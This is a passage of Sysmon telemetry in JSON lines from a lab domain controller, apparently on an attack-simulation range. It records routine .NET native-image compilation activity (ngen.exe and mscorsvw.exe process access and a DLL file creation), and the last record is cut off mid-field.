{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-001099801000}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-001099801000}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010DE831000}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010DE831000}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010DE831000}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010DE831000}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010DE831000}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010DE831000}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:36.387\r\nProcessGuid: {A837DB8D-04C8-5F25-0000-0010DE831000}\r\nProcessId: 1172\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\494-0\\System.Drawing.Design.dll\r\nCreationUtcTime: 2020-08-01 05:59:36.387","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:36.387","ProcessGuid":"{A837DB8D-04C8-5F25-0000-0010DE831000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\494-0\\System.Drawing.Design.dll","CreationUtcTime":"2020-08-01 05:59:36.387","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-00109C871000}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-00109C871000}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-00109C871000}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-00109C871000}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-00109C871000}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-00109C871000}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.481\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04B6-5F25-0000-0010EA281000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 